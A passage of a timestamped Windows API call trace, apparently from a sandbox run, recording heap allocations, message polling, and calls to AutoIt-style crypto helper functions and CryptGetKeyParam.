HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf4c4) returned 0x88ffb0 [0031.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.441] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf4c4) returned 0x955018 [0031.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.441] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.442] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.442] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf4c4) returned 0x955018 [0031.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0031.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889988 [0031.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf4c4) returned 0x89f480 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.444] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.444] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.444] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da398 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c808 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.445] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0031.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.445] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.446] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.446] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0031.447] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.447] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.447] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.447] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.447] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.448] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.448] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.448] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0031.448] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0031.448] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0031.448] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0031.449] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.449] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: 